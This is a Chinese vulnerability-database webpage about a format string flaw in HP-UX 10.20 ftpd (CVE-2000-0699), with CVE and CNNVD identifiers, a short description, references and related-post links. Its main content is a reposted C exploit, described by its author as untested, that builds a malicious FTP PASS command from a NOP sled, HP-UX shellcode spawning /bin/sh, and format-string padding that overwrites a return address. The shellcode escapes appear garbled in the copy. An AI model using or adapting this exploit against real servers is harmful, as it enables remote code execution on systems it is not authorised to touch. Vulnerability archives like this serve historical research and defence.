子比主题,更优雅的Wordpress主题
更优雅的WordPress网站主题:子比主题!全面开启

HP-UX 10.20 ftp格式字符串漏洞

90

HP-UX 10.20 ftp格式字符串漏洞

漏洞ID 1106109 漏洞类型 格式化字符串
发布时间 2000-12-01 更新时间 2005-05-02
图片[1]-HP-UX 10.20 ftp格式字符串漏洞-安全小百科CVE编号 CVE-2000-0699
 		图片[2]-HP-UX 10.20 ftp格式字符串漏洞-安全小百科CNNVD-ID CNNVD-200010-129
漏洞平台 HP-UX CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/212
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200010-129
|漏洞详情
HP-UX10.20版本中ftpd存在格式字符串漏洞。远程攻击者可以借助PASS命令中的格式字符串来导致服务拒绝或执行任意命令。
|漏洞EXP
/* theoretical exploit for hpux ftpd vulnerability              */
/* not tested anywhere, needs tweaking                          */

/* (c) 2000 by babcia padlina ltd. <[email protected]>  */

#include <stdio.h>
#include <stdlib.h>

#define NOPS 100
#define BUFSIZE 1024

char shellcode[] =                       /*   HP-UX shellcode   */
  "x34x16x05x06x96xd6x05x34x20x20x08x01xe4x20xe0x08x0b"
  "x5ax02x9axe8x3fx1fxfdx08x21x02x80x34x02x01x02x08x41"
  "x04x02x60x40x01x62xb4x5ax01x54x0bx39x02x99x0bx18x02"
  "x98x34x16x04xbex20x20x08x01xe4x20xe0x08x96xd6x05x34"
  "xdexadxcaxfex2fx62x69x6ex2fx73x68";

char nop[] = "x08x21x02x80";                /*  PA-RISC NOP */

unsigned long ret = 0xdeadbeef;

int main(argc, argv)
int argc;
char **argv;
{
  int stackofs;
  char buf[BUFSIZ*2];
  int i;

  for (strcpy(buf, "PASS "),i=0;i<NOPS;i++) strcat(buf, nop);
  sprintf(buf+strlen(buf), "%s%%.%dd%c%c%c%c", shellcode,
    BUFSIZE-strlen(shellcode)-NOPS*4-4,
    ((int)ret & 0xff), (((int)ret & 0xff00) >> 8),
    (((int)ret & 0xff0000) >> 16),
    (((int)ret & 0xff000000) >> 24));
  printf("USER ftprn%srn", buf);

  exit(0);
}


// milw0rm.com [2000-12-01]
|参考资料

来源:BID
名称:1560
链接:http://www.securityfocus.com/bid/1560
来源:BUGTRAQ
名称:20000806HPUXFTPdvulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2000-08/0028.html

相关推荐: BBS E-Market Professional Remote File Include Vulnerability

BBS E-Market Professional Remote File Include Vulnerability 漏洞ID 1097928 漏洞类型 Input Validation Error 发布时间 2004-09-09 更新时间 2004-09-…

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
网络安全漏洞
# 漏洞# cnnvd# hp
喜欢就支持一下吧
点赞0
分享
相关推荐
安全小百科-Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion
Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion
Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion
3年前 4732
安全小百科-帆软10.0 Getshell漏洞分析
帆软10.0 Getshell漏洞分析
帆软10.0 Getshell漏洞分析
3年前 1027
安全小百科-Multiple Lucent Router UDP Port 9 Information Disclosure Vulnerability
Multiple Lucent Router UDP Port 9 Information Disclosure Vulnerability
Multiple Lucent Router UDP Port 9 Information Disclosure Vulnerability
3年前 415
安全小百科-Symantec Enterprise Firewall DNSD DNS Cache Poisoning Vulnerability
Symantec Enterprise Firewall DNSD DNS Cache Poisoning Vulnerability
Symantec Enterprise Firewall DNSD DNS Cache Poisoning Vulnerability
3年前 395
安全小百科-iChat ROOMS Webserver任意文件读取漏洞
iChat ROOMS Webserver任意文件读取漏洞
iChat ROOMS Webserver任意文件读取漏洞
3年前 339
安全小百科-S.u.S.E. Linux useradd Vulnerability
S.u.S.E. Linux useradd Vulnerability
S.u.S.E. Linux useradd Vulnerability
3年前 322
搜索
开启精彩搜索
标签云
龟背龚某龙鱼龙马龙首龙车龙身龙芯龙生九子龙火龙海市龙泉驿区龙岩市龙女龙南县龙凤龙伯龍首龍門龍身
公司成功上市啦! - 作者:KOAL格尔国信-安全小百科

公司成功上市啦! – 作者:KOAL格尔国信

admin的头像-安全小百科3年前
048120
Comdev eCommerce 3.0 - 'config.php' Remote File Inclusion-安全小百科

Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion

admin的头像-安全小百科3年前
47320
GeoServer漏洞利用总结及案例参考 - 作者:vlong6-安全小百科

GeoServer漏洞利用总结及案例参考 – 作者:vlong6

admin的头像-安全小百科3年前
015680
女祭女戚-安全小百科

女祭女戚

admin的头像-安全小百科3年前
011260
帆软10.0 Getshell漏洞分析-安全小百科

帆软10.0 Getshell漏洞分析

admin的头像-安全小百科3年前
010270
科锐逆向线上班完整版视频2020年 - 作者:hgjhf63fa-安全小百科

科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa

admin的头像-安全小百科3年前
08680
恐龙抗狼扛的头像-安全小百科

恐龙抗狼扛8月前0

kankan
admin的头像-安全小百科

啊啊啊啊3年前0

66666666666666